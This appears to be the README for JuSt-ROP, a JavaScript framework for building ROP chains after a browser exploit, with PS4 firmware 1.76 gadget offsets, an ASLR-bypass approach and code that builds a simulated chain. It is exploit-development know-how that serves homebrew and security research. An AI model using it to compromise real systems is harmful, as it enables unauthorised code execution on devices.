About the developer

CTurt

Description

JavaScript ROP framework

JuSt-ROP

A framework which lets you directly write dynamic ROP chains in JavaScript before executing them via a browser exploit.

Using JavaScript to write and execute dynamic ROP chains gives us a tremendous advantage over a standard buffer overflow attack that carries a fixed, precomputed chain.

For one thing, we can read the modules table and calculate the addresses of all gadgets before we trigger ROP execution, bypassing ASLR.

We can also read the user agent of the browser, and provide a different ROP chain for different browser versions.

We can even use JavaScript to read the memory at our gadgets' addresses to check that they are correct.

Writing ROP chains dynamically, rather than generating them with a script beforehand, just makes sense.

Porting to your exploits

All gadgets and chains shown here were tested on PlayStation 4 firmware 1.76. To use this with any other exploit you will need to make several manual tweaks (for a 32-bit target, for example, replace things like `* 8` with `* 4`, since each chain slot holds a 4-byte pointer rather than an 8-byte one).

Expose the following globally:

* `getU8(address)`, `getU64(address)`, and `setU64(address, value)`
* `stackBase`
* `returnAddress` (so `stackBase + returnAddress` points to the return value of a function)
* `moduleBases` (an array of module base addresses)

Modify the `chainAddress` declaration to point somewhere suitable for your exploit.

Then place your gadgets in the `gadgets` array, using this syntax to declare a gadget:

`gadget(instructions, module, address)`

For example:

```javascript
// moduleBases[webkit] is the base address of the webkit module
var webkit = 14;
var libKernel = 1;

var gadgets = {
    "mov [rax], rcx": new gadget([0x48, 0x89, 0x08], webkit, 0x9ecde6),
    "mov [rax], rdx": new gadget([], webkit, 0x3579c0),
    "mov [rax], rsi": new gadget([], webkit, 0x2adea7),

    "mov [rdi], rax": new gadget([0x48, 0x89, 0x07], libKernel, 0xb0c8),
}
```

The `instructions` parameter is optional. If it is non-empty, the memory at the gadget's pointer is checked to ensure that it contains exactly those bytes and that they are followed by a `ret` instruction; a mismatch is reported before the chain is executed, so a wrong offset or a mixed-up module index shows up as a caught error rather than as a crash.

Usage

Make sure to include `just-rop.js` before `gadgets.js` to avoid getting a reference error.

What you can do now depends largely on which gadgets you have available and on the system you are exploiting (sandboxing might block some system calls, for example).

Here's a simple example chain:

```javascript
var chain = new rop();

try {
    chain.syscall("getpid", 20);

    // rax is the return value
    chain.write_rax_ToVariable(0);

    chain.execute(function() {
        console.log("PID: " + chain.getVariable(0).toString());
    });
} catch(e) {
    logAdd("Incorrect gadget address " + e.toString(16));
}
```
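The two steps the sections above describe, resolving each gadget from the module table and verifying its bytes, then laying the resolved addresses out at `chainAddress` one 8-byte slot at a time, are illustrated below. This is an added example, not JuSt-ROP's own code: it runs against a constructed in-process "memory" rather than a real browser, so the module bases, gadget offsets, planted gadget bytes, `chainAddress`, and the `getU8`/`getU64`/`setU64` stand-ins are all hypothetical, and the `gadget` function here is a model of the README's check, not the framework's implementation.

```javascript
// Added example, not JuSt-ROP's own code: models gadget resolution/verification
// and chain layout against a constructed in-process "memory".
// Everything below (module bases, offsets, gadget bytes, chainAddress) is a
// hypothetical stand-in for what a real browser exploit would provide.

const mem = new Uint8Array(0x10000);

// Memory primitives with the names the README asks the exploit to expose.
// Addresses are plain numbers here; a real 64-bit exploit would carry them as
// two 32-bit halves or as BigInt.
function getU8(address) { return mem[address]; }
function getU64(address) {
  let v = 0n;
  for (let i = 7; i >= 0; i--) v = (v << 8n) | BigInt(mem[address + i]);
  return v;
}
function setU64(address, value) {
  let v = BigInt(value);
  for (let i = 0; i < 8; i++) { mem[address + i] = Number(v & 0xffn); v >>= 8n; }
}

// Constructed module table: index 0 stands in for webkit, index 1 for libKernel.
const moduleBases = [0x1000, 0x8000];
const webkit = 0, libKernel = 1;
const RET = 0xc3;

// Plant gadget bytes (each followed by ret) at known offsets in the fake modules.
mem.set([0x48, 0x89, 0x08, RET], moduleBases[webkit] + 0x100);    // mov [rax], rcx ; ret
mem.set([0x58, RET],             moduleBases[webkit] + 0x200);    // pop rax ; ret
mem.set([0x48, 0x89, 0x07, RET], moduleBases[libKernel] + 0x40);  // mov [rdi], rax ; ret
mem.set([0x5f, RET],             moduleBases[libKernel] + 0x80);  // pop rdi ; ret

// gadget(instructions, module, address): resolve base + offset (the module
// table is what defeats ASLR), then, if instruction bytes were supplied,
// confirm they are really there and are followed by ret. A mismatch throws
// the bad pointer so the caller can report it before anything executes.
function gadget(instructions, module, address) {
  const ptr = moduleBases[module] + address;
  if (instructions.length) {
    for (let i = 0; i < instructions.length; i++) {
      if (getU8(ptr + i) !== instructions[i]) throw ptr;
    }
    if (getU8(ptr + instructions.length) !== RET) throw ptr;
  }
  return ptr;
}

function resolveGadgets() {
  return {
    "pop rax":        gadget([0x58], webkit, 0x200),
    "pop rdi":        gadget([0x5f], libKernel, 0x80),
    "mov [rdi], rax": gadget([0x48, 0x89, 0x07], libKernel, 0x40),
    "mov [rax], rcx": gadget([0x48, 0x89, 0x08], webkit, 0x100),
  };
}

// Lay the chain out at chainAddress: one 8-byte slot per gadget address or
// immediate (this "* 8" is the stride that becomes "* 4" on a 32-bit target).
function buildChain(chainAddress, gadgets, ops) {
  let slot = 0;
  for (const op of ops) {
    const value = op.gadget !== undefined ? gadgets[op.gadget] : op.value;
    if (value === undefined) throw new Error("unknown gadget " + op.gadget);
    setU64(chainAddress + slot * 8, value);
    slot++;
  }
  return slot; // number of slots written
}

// Worked chain: store 0x41 at 0x9000 via pop rax ; pop rdi ; mov [rdi], rax.
function exampleChain(chainAddress) {
  const gadgets = resolveGadgets();
  const count = buildChain(chainAddress, gadgets, [
    { gadget: "pop rax" }, { value: 0x41 },
    { gadget: "pop rdi" }, { value: 0x9000 },
    { gadget: "mov [rdi], rax" },
  ]);
  return {
    count,
    slot0: getU64(chainAddress),       // address of pop rax ; ret
    slot1: getU64(chainAddress + 8),   // the immediate 0x41
    slot2: getU64(chainAddress + 16),  // address of pop rdi ; ret
  };
}

// A wrong offset is caught before the chain runs: the bytes at libKernel+0x41
// are the tail of "mov [rdi], rax", not "pop rdi ; ret".
function badGadgetIsDetected() {
  try {
    gadget([0x5f], libKernel, 0x41);
    return false;
  } catch (e) {
    return e === moduleBases[libKernel] + 0x41;
  }
}
```

Calling `exampleChain(0x4000)` writes five slots and returns the resolved addresses that landed in them; `badGadgetIsDetected()` shows the verification path rejecting an off-by-one offset with the offending pointer, which is exactly what the `catch(e)` in the README's example chain is there to report.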
